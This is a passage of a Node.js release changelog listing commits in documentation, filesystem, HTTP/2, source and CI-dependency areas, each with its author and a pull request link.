[#&#8203;59007](https://redirect.github.com/nodejs/node/pull/59007)
-
\[[`95c51fa984`](https://redirect.github.com/nodejs/node/commit/95c51fa984)]
- **doc**: correct invalid collaborator profile (JJ)
[#&#8203;61091](https://redirect.github.com/nodejs/node/pull/61091)
-
\[[`f5a044763c`](https://redirect.github.com/nodejs/node/commit/f5a044763c)]
- **doc**: exclude compile-time flag features from security policy
(Matteo Collina)
[#&#8203;61109](https://redirect.github.com/nodejs/node/pull/61109)
-
\[[`b6ebf2cd53`](https://redirect.github.com/nodejs/node/commit/b6ebf2cd53)]
- **doc**: add
[@&#8203;avivkeller](https://redirect.github.com/avivkeller) to
collaborators (Aviv Keller)
[#&#8203;61115](https://redirect.github.com/nodejs/node/pull/61115)
-
\[[`35854f424d`](https://redirect.github.com/nodejs/node/commit/35854f424d)]
- **doc**: add gurgunday to collaborators (Gürgün Dayıoğlu)
[#&#8203;61094](https://redirect.github.com/nodejs/node/pull/61094)
-
\[[`4932322c29`](https://redirect.github.com/nodejs/node/commit/4932322c29)]
- **doc**: add File modes cross-references in fs methods (Mohit Raj
Saxena)
[#&#8203;60286](https://redirect.github.com/nodejs/node/pull/60286)
-
\[[`c84904e047`](https://redirect.github.com/nodejs/node/commit/c84904e047)]
- **doc**: add missing `zstd` to mjs example of zlib (Deokjin Kim)
[#&#8203;60915](https://redirect.github.com/nodejs/node/pull/60915)
-
\[[`e615b9e2f2`](https://redirect.github.com/nodejs/node/commit/e615b9e2f2)]
- **doc**: clarify fileURLToPath security considerations (Rafael
Gonzaga)
[#&#8203;60887](https://redirect.github.com/nodejs/node/pull/60887)
-
\[[`99e384e6d4`](https://redirect.github.com/nodejs/node/commit/99e384e6d4)]
- **doc**: replace column with columnNumber in example of
`util.getCallSites` (Deokjin Kim)
[#&#8203;60881](https://redirect.github.com/nodejs/node/pull/60881)
-
\[[`9351bb4d02`](https://redirect.github.com/nodejs/node/commit/9351bb4d02)]
- **doc**: correct spelling in BUILDING.md (Rich Trott)
[#&#8203;60875](https://redirect.github.com/nodejs/node/pull/60875)
-
\[[`e1f6e7fc4d`](https://redirect.github.com/nodejs/node/commit/e1f6e7fc4d)]
- **doc**: update debuglog examples to use 'foo-bar' instead of 'foo'
(xiaoyao)
[#&#8203;60867](https://redirect.github.com/nodejs/node/pull/60867)
-
\[[`ccbb2d7300`](https://redirect.github.com/nodejs/node/commit/ccbb2d7300)]
- **doc**: fix typos in changelogs (Rich Trott)
[#&#8203;60855](https://redirect.github.com/nodejs/node/pull/60855)
-
\[[`1cb2fe8b35`](https://redirect.github.com/nodejs/node/commit/1cb2fe8b35)]
- **doc**: mark module.register as active development (Chengzhong Wu)
[#&#8203;60849](https://redirect.github.com/nodejs/node/pull/60849)
-
\[[`ceeb4968a6`](https://redirect.github.com/nodejs/node/commit/ceeb4968a6)]
- **doc**: add fullName property to SuiteContext (PaulyBearCoding)
[#&#8203;60762](https://redirect.github.com/nodejs/node/pull/60762)
-
\[[`56155909dd`](https://redirect.github.com/nodejs/node/commit/56155909dd)]
- **doc**: keep sidebar module visible when navigating docs (Botato)
[#&#8203;60410](https://redirect.github.com/nodejs/node/pull/60410)
-
\[[`6b637763d5`](https://redirect.github.com/nodejs/node/commit/6b637763d5)]
- **doc**: correct concurrency wording in test() documentation (Azad
Gupta)
[#&#8203;60773](https://redirect.github.com/nodejs/node/pull/60773)
-
\[[`7183e8ffa1`](https://redirect.github.com/nodejs/node/commit/7183e8ffa1)]
- **doc**: clarify that CQ only picks up PRs targeting `main` (René)
[#&#8203;60731](https://redirect.github.com/nodejs/node/pull/60731)
-
\[[`d5d94303be`](https://redirect.github.com/nodejs/node/commit/d5d94303be)]
- **doc**: clarify license section and add contributor note
(KaleruMadhu)
[#&#8203;60590](https://redirect.github.com/nodejs/node/pull/60590)
-
\[[`e0210c8f53`](https://redirect.github.com/nodejs/node/commit/e0210c8f53)]
- **doc**: correct tls ALPNProtocols types (René)
[#&#8203;60143](https://redirect.github.com/nodejs/node/pull/60143)
-
\[[`eff87b498a`](https://redirect.github.com/nodejs/node/commit/eff87b498a)]
- **doc**: remove mention of SMS 2FA (Antoine du Hamel)
[#&#8203;60707](https://redirect.github.com/nodejs/node/pull/60707)
-
\[[`e77ef94a51`](https://redirect.github.com/nodejs/node/commit/e77ef94a51)]
- **doc**: `domain.add()` does not accept timer objects (René)
[#&#8203;60675](https://redirect.github.com/nodejs/node/pull/60675)
-
\[[`4fe19c95ea`](https://redirect.github.com/nodejs/node/commit/4fe19c95ea)]
- **doc**: update Collaborators list to reflect hybrist handle change
(Antoine du Hamel)
[#&#8203;60650](https://redirect.github.com/nodejs/node/pull/60650)
-
\[[`eece59b6ce`](https://redirect.github.com/nodejs/node/commit/eece59b6ce)]
- **doc**: fix linter issues (Antoine du Hamel)
[#&#8203;60636](https://redirect.github.com/nodejs/node/pull/60636)
-
\[[`6e17e596e4`](https://redirect.github.com/nodejs/node/commit/6e17e596e4)]
- **doc**: correct values/references for buffer.kMaxLength (René)
[#&#8203;60305](https://redirect.github.com/nodejs/node/pull/60305)
-
\[[`ac327ae9a7`](https://redirect.github.com/nodejs/node/commit/ac327ae9a7)]
- **doc**: recommend events.once to manage 'close' event (Dan Fabulich)
[#&#8203;60017](https://redirect.github.com/nodejs/node/pull/60017)
-
\[[`d9b149ea42`](https://redirect.github.com/nodejs/node/commit/d9b149ea42)]
- **doc**: highlight module loading difference between import and
require (Ajay A)
[#&#8203;59815](https://redirect.github.com/nodejs/node/pull/59815)
-
\[[`f6d62cb22c`](https://redirect.github.com/nodejs/node/commit/f6d62cb22c)]
- **doc**: fix typo in `process.unref` documentation (우혁)
[#&#8203;59698](https://redirect.github.com/nodejs/node/pull/59698)
-
\[[`6d5078b196`](https://redirect.github.com/nodejs/node/commit/6d5078b196)]
- **doc**: add some entries to `glossary.md` (Mohataseem Khan)
[#&#8203;59277](https://redirect.github.com/nodejs/node/pull/59277)
-
\[[`b0a5820dea`](https://redirect.github.com/nodejs/node/commit/b0a5820dea)]
- **doc**: improve agent.createConnection docs for http and https agents
(JaeHo Jang)
[#&#8203;58205](https://redirect.github.com/nodejs/node/pull/58205)
-
\[[`b5db02fe67`](https://redirect.github.com/nodejs/node/commit/b5db02fe67)]
- **doc**: fix pseudo code in modules.md (chirsz)
[#&#8203;57677](https://redirect.github.com/nodejs/node/pull/57677)
-
\[[`e9b912d481`](https://redirect.github.com/nodejs/node/commit/e9b912d481)]
- **doc**: add missing variable in code snippet (Koushil Mankali)
[#&#8203;55478](https://redirect.github.com/nodejs/node/pull/55478)
-
\[[`44c06c7812`](https://redirect.github.com/nodejs/node/commit/44c06c7812)]
- **doc**: add missing word in `single-executable-applications.md`
(Konstantin Tsabolov)
[#&#8203;53864](https://redirect.github.com/nodejs/node/pull/53864)
-
\[[`482b43f160`](https://redirect.github.com/nodejs/node/commit/482b43f160)]
- **doc**: fix typo in http.md (Michael Solomon)
[#&#8203;59354](https://redirect.github.com/nodejs/node/pull/59354)
-
\[[`cd323bc718`](https://redirect.github.com/nodejs/node/commit/cd323bc718)]
- **doc**: update devcontainer.json and add documentation (Joyee Cheung)
[#&#8203;60472](https://redirect.github.com/nodejs/node/pull/60472)
-
\[[`c7c70f3a16`](https://redirect.github.com/nodejs/node/commit/c7c70f3a16)]
- **doc**: add haramj as triager (Haram Jeong)
[#&#8203;60348](https://redirect.github.com/nodejs/node/pull/60348)
-
\[[`04b8c4d14e`](https://redirect.github.com/nodejs/node/commit/04b8c4d14e)]
- **doc**: clarify require(esm) description (dynst)
[#&#8203;60520](https://redirect.github.com/nodejs/node/pull/60520)
-
\[[`de382dc832`](https://redirect.github.com/nodejs/node/commit/de382dc832)]
- **doc**: instantiate resolver object (Donghoon Nam)
[#&#8203;60476](https://redirect.github.com/nodejs/node/pull/60476)
-
\[[`b6845ce460`](https://redirect.github.com/nodejs/node/commit/b6845ce460)]
- **doc**: clarify --use-system-ca support status (Joyee Cheung)
[#&#8203;60340](https://redirect.github.com/nodejs/node/pull/60340)
-
\[[`0894dae9bc`](https://redirect.github.com/nodejs/node/commit/0894dae9bc)]
- **doc**: add missing CAA type to dns.resolveAny() &
dnsPromises.resolveAny() (Jimmy Leung)
[#&#8203;58899](https://redirect.github.com/nodejs/node/pull/58899)
-
\[[`c86a69f692`](https://redirect.github.com/nodejs/node/commit/c86a69f692)]
- **doc**: use `any` for `worker_threads.Worker` 'error' event argument
`err` (Jonas Geiler)
[#&#8203;60300](https://redirect.github.com/nodejs/node/pull/60300)
-
\[[`0c5031e233`](https://redirect.github.com/nodejs/node/commit/0c5031e233)]
- **doc**: update decorator documentation to reflect actual policy
(Muhammad Salman Aziz)
[#&#8203;60288](https://redirect.github.com/nodejs/node/pull/60288)
-
\[[`b01f710175`](https://redirect.github.com/nodejs/node/commit/b01f710175)]
- **doc**: document wildcard supported by tools/test.py (Joyee Cheung)
[#&#8203;60265](https://redirect.github.com/nodejs/node/pull/60265)
-
\[[`b4524dabcc`](https://redirect.github.com/nodejs/node/commit/b4524dabcc)]
- **doc**: fix `blob.bytes()` heading level (XTY)
[#&#8203;60252](https://redirect.github.com/nodejs/node/pull/60252)
-
\[[`5df02776e3`](https://redirect.github.com/nodejs/node/commit/5df02776e3)]
- **doc**: fix not working code example in vm docs (Artur Gawlik)
[#&#8203;60224](https://redirect.github.com/nodejs/node/pull/60224)
-
\[[`6a4359a0b5`](https://redirect.github.com/nodejs/node/commit/6a4359a0b5)]
- **doc**: improve code snippet alternative of url.parse() using WHATWG
URL (Steven)
[#&#8203;60209](https://redirect.github.com/nodejs/node/pull/60209)
-
\[[`ad06bee70d`](https://redirect.github.com/nodejs/node/commit/ad06bee70d)]
- **doc**: use markdown when branch-diff major release (Rafael Gonzaga)
[#&#8203;60179](https://redirect.github.com/nodejs/node/pull/60179)
-
\[[`c0d4b11ed4`](https://redirect.github.com/nodejs/node/commit/c0d4b11ed4)]
- **doc**: update teams in collaborator-guide.md and add links (Bart
Louwers)
[#&#8203;60065](https://redirect.github.com/nodejs/node/pull/60065)
-
\[[`20b5ffcac3`](https://redirect.github.com/nodejs/node/commit/20b5ffcac3)]
- **doc**: update previous version links in BUILDING (Mike McCready)
[#&#8203;61457](https://redirect.github.com/nodejs/node/pull/61457)
-
\[[`de345ea3a3`](https://redirect.github.com/nodejs/node/commit/de345ea3a3)]
- **doc**: correct description of `error.stack` accessor behavior (René)
[#&#8203;61090](https://redirect.github.com/nodejs/node/pull/61090)
-
\[[`d8418d9de7`](https://redirect.github.com/nodejs/node/commit/d8418d9de7)]
- **doc**: fix link in `--env-file=file` section (N. Bighetti)
[#&#8203;60563](https://redirect.github.com/nodejs/node/pull/60563)
-
\[[`1107bda21e`](https://redirect.github.com/nodejs/node/commit/1107bda21e)]
- **doc**: fix v22 changelog after security release (Marco Ippolito)
[#&#8203;61371](https://redirect.github.com/nodejs/node/pull/61371)
-
\[[`42aab9469a`](https://redirect.github.com/nodejs/node/commit/42aab9469a)]
- **doc**: add missing history entry for `sqlite.md` (Antoine du Hamel)
[#&#8203;60607](https://redirect.github.com/nodejs/node/pull/60607)
-
\[[`deb6d5deff`](https://redirect.github.com/nodejs/node/commit/deb6d5deff)]
- **doc, module**: change async customization hooks to experimental
(Gerhard Stöbich)
[#&#8203;60302](https://redirect.github.com/nodejs/node/pull/60302)
-
\[[`c659add7d1`](https://redirect.github.com/nodejs/node/commit/c659add7d1)]
- **doc,src,lib**: clarify experimental status of Web Storage support
(Antoine du Hamel)
[#&#8203;60708](https://redirect.github.com/nodejs/node/pull/60708)
-
\[[`dda95e91b9`](https://redirect.github.com/nodejs/node/commit/dda95e91b9)]
- **esm**: avoid throw when module specifier is not url (Craig Macomber
(Microsoft))
[#&#8203;61000](https://redirect.github.com/nodejs/node/pull/61000)
-
\[[`912945be89`](https://redirect.github.com/nodejs/node/commit/912945be89)]
- **events**: remove redundant todo (Gürgün Dayıoğlu)
[#&#8203;60595](https://redirect.github.com/nodejs/node/pull/60595)
-
\[[`22e156eb10`](https://redirect.github.com/nodejs/node/commit/22e156eb10)]
- **events**: remove eventtarget custom inspect branding (Efe)
[#&#8203;61128](https://redirect.github.com/nodejs/node/pull/61128)
-
\[[`df6fd9b03f`](https://redirect.github.com/nodejs/node/commit/df6fd9b03f)]
- **fs**: remove duplicate getValidatedPath calls (Mert Can Altin)
[#&#8203;61359](https://redirect.github.com/nodejs/node/pull/61359)
-
\[[`6ea3e4d850`](https://redirect.github.com/nodejs/node/commit/6ea3e4d850)]
- **fs**: fix errorOnExist behavior for directory copy in fs.cp
(Nicholas Paun)
[#&#8203;60946](https://redirect.github.com/nodejs/node/pull/60946)
-
\[[`dd918b9980`](https://redirect.github.com/nodejs/node/commit/dd918b9980)]
- **fs**: fix ENOTDIR in globSync when file is treated as dir (sangwook)
[#&#8203;61259](https://redirect.github.com/nodejs/node/pull/61259)
-
\[[`4908e67ba0`](https://redirect.github.com/nodejs/node/commit/4908e67ba0)]
- **fs**: remove duplicate fd validation in sync functions (Mert Can
Altin)
[#&#8203;61361](https://redirect.github.com/nodejs/node/pull/61361)
-
\[[`4a27bce3d9`](https://redirect.github.com/nodejs/node/commit/4a27bce3d9)]
- **fs**: detect dot files when using globstar (Robin van Wijngaarden)
[#&#8203;61012](https://redirect.github.com/nodejs/node/pull/61012)
-
\[[`b0186ff65c`](https://redirect.github.com/nodejs/node/commit/b0186ff65c)]
- **fs**: validate statfs path (Efe)
[#&#8203;61230](https://redirect.github.com/nodejs/node/pull/61230)
-
\[[`6689775023`](https://redirect.github.com/nodejs/node/commit/6689775023)]
- **gyp**: aix: change gcc version detection so CXX="ccache g++" works
(Stewart X Addison)
[#&#8203;61464](https://redirect.github.com/nodejs/node/pull/61464)
-
\[[`5c4f4db663`](https://redirect.github.com/nodejs/node/commit/5c4f4db663)]
- **http**: fix rawHeaders exceeding maxHeadersCount limit (Max Harari)
[#&#8203;61285](https://redirect.github.com/nodejs/node/pull/61285)
-
\[[`7599e2eccd`](https://redirect.github.com/nodejs/node/commit/7599e2eccd)]
- **http**: replace startsWith with strict equality (btea)
[#&#8203;59394](https://redirect.github.com/nodejs/node/pull/59394)
-
\[[`99a85213bf`](https://redirect.github.com/nodejs/node/commit/99a85213bf)]
- **http**: lazy allocate cookies array (Robert Nagy)
[#&#8203;59734](https://redirect.github.com/nodejs/node/pull/59734)
-
\[[`7669e6a5ad`](https://redirect.github.com/nodejs/node/commit/7669e6a5ad)]
- **http**: fix http client leaky with double response (theanarkh)
[#&#8203;60062](https://redirect.github.com/nodejs/node/pull/60062)
-
\[[`f074c126a8`](https://redirect.github.com/nodejs/node/commit/f074c126a8)]
- **http,https**: fix double ERR\_PROXY\_TUNNEL emission (Shima Ryuhei)
[#&#8203;60699](https://redirect.github.com/nodejs/node/pull/60699)
-
\[[`d8ac368363`](https://redirect.github.com/nodejs/node/commit/d8ac368363)]
- **http2**: add diagnostics channels for client stream request body
(Darshan Sen)
[#&#8203;60480](https://redirect.github.com/nodejs/node/pull/60480)
-
\[[`e26a7e464d`](https://redirect.github.com/nodejs/node/commit/e26a7e464d)]
- **http2**: rename variable to additionalPseudoHeaders (Tobias Nießen)
[#&#8203;60208](https://redirect.github.com/nodejs/node/pull/60208)
-
\[[`5df634f46e`](https://redirect.github.com/nodejs/node/commit/5df634f46e)]
- **http2**: validate initialWindowSize per HTTP/2 spec (Matteo Collina)
[#&#8203;61402](https://redirect.github.com/nodejs/node/pull/61402)
-
\[[`2ccc9a6205`](https://redirect.github.com/nodejs/node/commit/2ccc9a6205)]
- **http2**: do not crash on mismatched ping buffer length (René)
[#&#8203;60135](https://redirect.github.com/nodejs/node/pull/60135)
-
\[[`3e68a5f78a`](https://redirect.github.com/nodejs/node/commit/3e68a5f78a)]
- **inspector**: inspect HTTP response body (Chengzhong Wu)
[#&#8203;60572](https://redirect.github.com/nodejs/node/pull/60572)
-
\[[`a86ffa9a5d`](https://redirect.github.com/nodejs/node/commit/a86ffa9a5d)]
- **inspector**: add network payload buffer size limits (Chengzhong Wu)
[#&#8203;60236](https://redirect.github.com/nodejs/node/pull/60236)
-
\[[`ea60ef5d74`](https://redirect.github.com/nodejs/node/commit/ea60ef5d74)]
- **lib**: fix typo in `util.js` comment (Taejin Kim)
[#&#8203;61365](https://redirect.github.com/nodejs/node/pull/61365)
-
\[[`9d8d9322a4`](https://redirect.github.com/nodejs/node/commit/9d8d9322a4)]
- **lib**: fix TypeScript support check in jitless mode (sangwook)
[#&#8203;61382](https://redirect.github.com/nodejs/node/pull/61382)
-
\[[`fc26f5c78f`](https://redirect.github.com/nodejs/node/commit/fc26f5c78f)]
- **lib**: gbk decoder is gb18030 decoder per spec (Сковорода Никита
Андреевич)
[#&#8203;61099](https://redirect.github.com/nodejs/node/pull/61099)
-
\[[`3b87030012`](https://redirect.github.com/nodejs/node/commit/3b87030012)]
- **lib**: enforce use of `URLParse` (Antoine du Hamel)
[#&#8203;61016](https://redirect.github.com/nodejs/node/pull/61016)
-
\[[`2a7479d4fc`](https://redirect.github.com/nodejs/node/commit/2a7479d4fc)]
- **lib**: use `FastBuffer` for empty buffer allocation (Gürgün
Dayıoğlu)
[#&#8203;60558](https://redirect.github.com/nodejs/node/pull/60558)
-
\[[`7cf4c43582`](https://redirect.github.com/nodejs/node/commit/7cf4c43582)]
- **lib**: fix constructor in \_errnoException stack tree (SeokHun)
[#&#8203;60156](https://redirect.github.com/nodejs/node/pull/60156)
-
\[[`f9d87fbfaa`](https://redirect.github.com/nodejs/node/commit/f9d87fbfaa)]
- **lib**: fix typo in QuicSessionStats (SeokHun)
[#&#8203;60155](https://redirect.github.com/nodejs/node/pull/60155)
-
\[[`8d26ccc652`](https://redirect.github.com/nodejs/node/commit/8d26ccc652)]
- **lib**: remove redundant destroyHook checks (Gürgün Dayıoğlu)
[#&#8203;60120](https://redirect.github.com/nodejs/node/pull/60120)
-
\[[`705832a1be`](https://redirect.github.com/nodejs/node/commit/705832a1be)]
- **lib,src**: isInsideNodeModules should test on the first non-internal
frame (Chengzhong Wu)
[#&#8203;60991](https://redirect.github.com/nodejs/node/pull/60991)
-
\[[`6f39ad190b`](https://redirect.github.com/nodejs/node/commit/6f39ad190b)]
- **meta**: do not fast-track npm updates (Antoine du Hamel)
[#&#8203;61475](https://redirect.github.com/nodejs/node/pull/61475)
-
\[[`a6a0ff9486`](https://redirect.github.com/nodejs/node/commit/a6a0ff9486)]
- **meta**: fix typos in issue template config (Daijiro Wachi)
[#&#8203;61399](https://redirect.github.com/nodejs/node/pull/61399)
-
\[[`ec88c9b378`](https://redirect.github.com/nodejs/node/commit/ec88c9b378)]
- **meta**: label v8 module PRs (René)
[#&#8203;61325](https://redirect.github.com/nodejs/node/pull/61325)
-
\[[`83143835de`](https://redirect.github.com/nodejs/node/commit/83143835de)]
- **meta**: bump step-security/harden-runner from 2.13.2 to 2.14.0
(dependabot\[bot])
[#&#8203;61245](https://redirect.github.com/nodejs/node/pull/61245)
-
\[[`0802dc663a`](https://redirect.github.com/nodejs/node/commit/0802dc663a)]
- **meta**: bump actions/setup-node from 6.0.0 to 6.1.0
(dependabot\[bot])
[#&#8203;61244](https://redirect.github.com/nodejs/node/pull/61244)
-
\[[`587db55796`](https://redirect.github.com/nodejs/node/commit/587db55796)]
- **meta**: bump actions/cache from 4.3.0 to 5.0.1 (dependabot\[bot])
[#&#8203;61243](https://redirect.github.com/nodejs/node/pull/61243)
-
\[[`262c9d37a6`](https://redirect.github.com/nodejs/node/commit/262c9d37a6)]
- **meta**: bump github/codeql-action from 4.31.6 to 4.31.9
(dependabot\[bot])
[#&#8203;61241](https://redirect.github.com/nodejs/node/pull/61241)
-
\[[`d9763b5afd`](https://redirect.github.com/nodejs/node/commit/d9763b5afd)]
- **meta**: bump codecov/codecov-action from 5.5.1 to 5.5.2
(dependabot\[bot])
[#&#8203;61240](https://redirect.github.com/nodejs/node/pull/61240)
-
\[[`0af73d1811`](https://redirect.github.com/nodejs/node/commit/0af73d1811)]
- **meta**: bump peter-evans/create-pull-request from 7.0.9 to 8.0.0
(dependabot\[bot])
[#&#8203;61237](https://redirect.github.com/nodejs/node/pull/61237)
-
\[[`8be6afd239`](https://redirect.github.com/nodejs/node/commit/8be6afd239)]
- **meta**: move lukekarrys to emeritus (Node.js GitHub Bot)
[#&#8203;60985](https://redirect.github.com/nodejs/node/pull/60985)
-
\[[`c497de5c74`](https://redirect.github.com/nodejs/node/commit/c497de5c74)]
- **meta**: bump actions/setup-python from 6.0.0 to 6.1.0
(dependabot\[bot])
[#&#8203;60927](https://redirect.github.com/nodejs/node/pull/60927)
-
\[[`774920f169`](https://redirect.github.com/nodejs/node/commit/774920f169)]
- **meta**: bump github/codeql-action from 4.31.3 to 4.31.6
(dependabot\[bot])
[#&#8203;60926](https://redirect.github.com/nodejs/node/pull/60926)
-
\[[`ef3b1e5991`](https://redirect.github.com/nodejs/node/commit/ef3b1e5991)]
- **meta**: bump peter-evans/create-pull-request from 7.0.8 to 7.0.9
(dependabot\[bot])
[#&#8203;60924](https://redirect.github.com/nodejs/node/pull/60924)
-
\[[`3ed667379f`](https://redirect.github.com/nodejs/node/commit/3ed667379f)]
- **meta**: bump github/codeql-action from 4.31.2 to 4.31.3
(dependabot\[bot])
[#&#8203;60770](https://redirect.github.com/nodejs/node/pull/60770)
-
\[[`7c0cefb126`](https://redirect.github.com/nodejs/node/commit/7c0cefb126)]
- **meta**: bump step-security/harden-runner from 2.13.1 to 2.13.2
(dependabot\[bot])
[#&#8203;60769](https://redirect.github.com/nodejs/node/pull/60769)
-
\[[`5c6a076e5d`](https://redirect.github.com/nodejs/node/commit/5c6a076e5d)]
- **meta**: add Renegade334 to collaborators (Renegade334)
[#&#8203;60714](https://redirect.github.com/nodejs/node/pull/60714)
-
\[[`4f4dda2a18`](https://redirect.github.com/nodejs/node/commit/4f4dda2a18)]
- **meta**: bump actions/download-artifact from 5.0.0 to 6.0.0
(dependabot\[bot])
[#&#8203;60532](https://redirect.github.com/nodejs/node/pull/60532)
-
\[[`c436f8d57c`](https://redirect.github.com/nodejs/node/commit/c436f8d57c)]
- **meta**: bump actions/upload-artifact from 4.6.2 to 5.0.0
(dependabot\[bot])
[#&#8203;60531](https://redirect.github.com/nodejs/node/pull/60531)
-
\[[`402d9f87a6`](https://redirect.github.com/nodejs/node/commit/402d9f87a6)]
- **meta**: bump github/codeql-action from 3.30.5 to 4.31.2
(dependabot\[bot])
[#&#8203;60533](https://redirect.github.com/nodejs/node/pull/60533)
-
\[[`61be78e326`](https://redirect.github.com/nodejs/node/commit/61be78e326)]
- **meta**: bump actions/setup-node from 5.0.0 to 6.0.0
(dependabot\[bot])
[#&#8203;60529](https://redirect.github.com/nodejs/node/pull/60529)
-
\[[`7e4164a623`](https://redirect.github.com/nodejs/node/commit/7e4164a623)]
- **meta**: bump actions/stale from 10.0.0 to 10.1.0 (dependabot\[bot])
[#&#8203;60528](https://redirect.github.com/nodejs/node/pull/60528)
-
\[[`1bf6e1d010`](https://redirect.github.com/nodejs/node/commit/1bf6e1d010)]
- **meta**: move one or more collaborators to emeritus (Node.js GitHub
Bot) [#&#8203;60325](https://redirect.github.com/nodejs/node/pull/60325)
-
\[[`c66fc0e9cf`](https://redirect.github.com/nodejs/node/commit/c66fc0e9cf)]
- **meta**: loop userland-migrations in deprecations (Chengzhong Wu)
[#&#8203;60299](https://redirect.github.com/nodejs/node/pull/60299)
-
\[[`e4be0791e7`](https://redirect.github.com/nodejs/node/commit/e4be0791e7)]
- **meta**: call `create-release-post.yml` post release (Aviv Keller)
[#&#8203;60366](https://redirect.github.com/nodejs/node/pull/60366)
-
\[[`8674f6527f`](https://redirect.github.com/nodejs/node/commit/8674f6527f)]
- **module**: preserve URL in the parent created by createRequire()
(Joyee Cheung)
[#&#8203;60974](https://redirect.github.com/nodejs/node/pull/60974)
-
\[[`41db87a975`](https://redirect.github.com/nodejs/node/commit/41db87a975)]
- **msi**: fix WiX warnings (Stefan Stojanovic)
[#&#8203;60251](https://redirect.github.com/nodejs/node/pull/60251)
-
\[[`884f313f40`](https://redirect.github.com/nodejs/node/commit/884f313f40)]
- **node-api**: use Node-API in comments (Vladimir Morozov)
[#&#8203;61320](https://redirect.github.com/nodejs/node/pull/61320)
-
\[[`375164190b`](https://redirect.github.com/nodejs/node/commit/375164190b)]
- **node-api**: use local files for instanceof test (Vladimir Morozov)
[#&#8203;60190](https://redirect.github.com/nodejs/node/pull/60190)
-
\[[`972a1107c0`](https://redirect.github.com/nodejs/node/commit/972a1107c0)]
- **os**: freeze signals constant (Xavier Stouder)
[#&#8203;61038](https://redirect.github.com/nodejs/node/pull/61038)
-
\[[`e992057ab7`](https://redirect.github.com/nodejs/node/commit/e992057ab7)]
- **perf\_hooks**: fix stack overflow error (Antoine du Hamel)
[#&#8203;60084](https://redirect.github.com/nodejs/node/pull/60084)
-
\[[`0bb1814fdf`](https://redirect.github.com/nodejs/node/commit/0bb1814fdf)]
- **repl**: fix pasting after moving the cursor to the left (Ruben
Bridgewater)
[#&#8203;60470](https://redirect.github.com/nodejs/node/pull/60470)
-
\[[`35a12fb996`](https://redirect.github.com/nodejs/node/commit/35a12fb996)]
- **src**: replace `ranges::sort` for libc++13 compatibility on armhf
(Rebroad)
[#&#8203;61789](https://redirect.github.com/nodejs/node/pull/61789)
-
\[[`dbf00d4664`](https://redirect.github.com/nodejs/node/commit/dbf00d4664)]
- **src**: add missing override specifier to Clean() (Tobias Nießen)
[#&#8203;61429](https://redirect.github.com/nodejs/node/pull/61429)
-
\[[`140eba35d3`](https://redirect.github.com/nodejs/node/commit/140eba35d3)]
- **src**: cache context lookup in vectored io loops (Mert Can Altin)
[#&#8203;61387](https://redirect.github.com/nodejs/node/pull/61387)
-
\[[`93e7e1708b`](https://redirect.github.com/nodejs/node/commit/93e7e1708b)]
- **src**: use C++ nullptr in webstorage (Tobias Nießen)
[#&#8203;61407](https://redirect.github.com/nodejs/node/pull/61407)
-
\[[`ef868447bc`](https://redirect.github.com/nodejs/node/commit/ef868447bc)]
- **src**: fix pointer alignment (jhofstee)
[#&#8203;61336](https://redirect.github.com/nodejs/node/pull/61336)
-
\[[`a96256524c`](https://redirect.github.com/nodejs/node/commit/a96256524c)]
- **src**: dump snapshot source with
node:generate\_default\_snapshot\_source (Joyee Cheung)
[#&#8203;61101](https://redirect.github.com/nodejs/node/pull/61101)
-
\[[`ec051b9efd`](https://redirect.github.com/nodejs/node/commit/ec051b9efd)]
- **src**: add HandleScope to edge loop in heap\_utils (Mert Can Altin)
[#&#8203;60885](https://redirect.github.com/nodejs/node/pull/60885)
-
\[[`41749eb5d6`](https://redirect.github.com/nodejs/node/commit/41749eb5d6)]
- **src**: remove redundant CHECK (Tobias Nießen)
[#&#8203;61130](https://redirect.github.com/nodejs/node/pull/61130)
-
\[[`57c81e5af3`](https://redirect.github.com/nodejs/node/commit/57c81e5af3)]
- **src**: fix off-thread cert loading in bundled cert mode (Joyee
Cheung)
[#&#8203;60764](https://redirect.github.com/nodejs/node/pull/60764)
-
\[[`4b0616e024`](https://redirect.github.com/nodejs/node/commit/4b0616e024)]
- **src**: handle DER decoding errors from system certificates (Joyee
Cheung)
[#&#8203;60787](https://redirect.github.com/nodejs/node/pull/60787)
-
\[[`93393371f9`](https://redirect.github.com/nodejs/node/commit/93393371f9)]
- **src**: use static\_cast instead of C-style cast (Michaël Zasso)
[#&#8203;60868](https://redirect.github.com/nodejs/node/pull/60868)
-
\[[`900445b655`](https://redirect.github.com/nodejs/node/commit/900445b655)]
- **src**: move Node-API version detection to where it is used (Anna
Henningsen)
[#&#8203;60512](https://redirect.github.com/nodejs/node/pull/60512)
-
\[[`8353a6da2a`](https://redirect.github.com/nodejs/node/commit/8353a6da2a)]
- **src**: avoid C strings in more C++ exception throws (Anna
Henningsen)
[#&#8203;60592](https://redirect.github.com/nodejs/node/pull/60592)
-
\[[`27c860c51f`](https://redirect.github.com/nodejs/node/commit/27c860c51f)]
- **src**: move `napi_addon_register_func` to `node_api_types.h` (Anna
Henningsen)
[#&#8203;60512](https://redirect.github.com/nodejs/node/pull/60512)
-
\[[`e0517752e7`](https://redirect.github.com/nodejs/node/commit/e0517752e7)]
- **src**: remove unconditional NAPI\_EXPERIMENTAL in node.h (Chengzhong
Wu) [#&#8203;60345](https://redirect.github.com/nodejs/node/pull/60345)
-
\[[`21e2a52f8e`](https://redirect.github.com/nodejs/node/commit/21e2a52f8e)]
- **src**: clean up generic counter implementation (Anna Henningsen)
[#&#8203;60447](https://redirect.github.com/nodejs/node/pull/60447)
-
\[[`aed23cb8ca`](https://redirect.github.com/nodejs/node/commit/aed23cb8ca)]
- **src**: add enum handle for ToStringHelper + formatting (Burkov Egor)
[#&#8203;56829](https://redirect.github.com/nodejs/node/pull/56829)
-
\[[`2e93650ebc`](https://redirect.github.com/nodejs/node/commit/2e93650ebc)]
- **src**: fix timing of snapshot serialize callback (Joyee Cheung)
[#&#8203;60434](https://redirect.github.com/nodejs/node/pull/60434)
-
\[[`ece4acc18f`](https://redirect.github.com/nodejs/node/commit/ece4acc18f)]
- **src**: add COUNT\_GENERIC\_USAGE utility for tests (Joyee Cheung)
[#&#8203;60434](https://redirect.github.com/nodejs/node/pull/60434)
-
\[[`31c8e9d9ff`](https://redirect.github.com/nodejs/node/commit/31c8e9d9ff)]
- **src**: use cached primordials\_string (Sohyeon Kim)
[#&#8203;60255](https://redirect.github.com/nodejs/node/pull/60255)
-
\[[`7f0ffddc14`](https://redirect.github.com/nodejs/node/commit/7f0ffddc14)]
- **src**: implement Windows-1252 encoding support and update related
tests (Mert Can Altin)
[#&#8203;60893](https://redirect.github.com/nodejs/node/pull/60893)
-
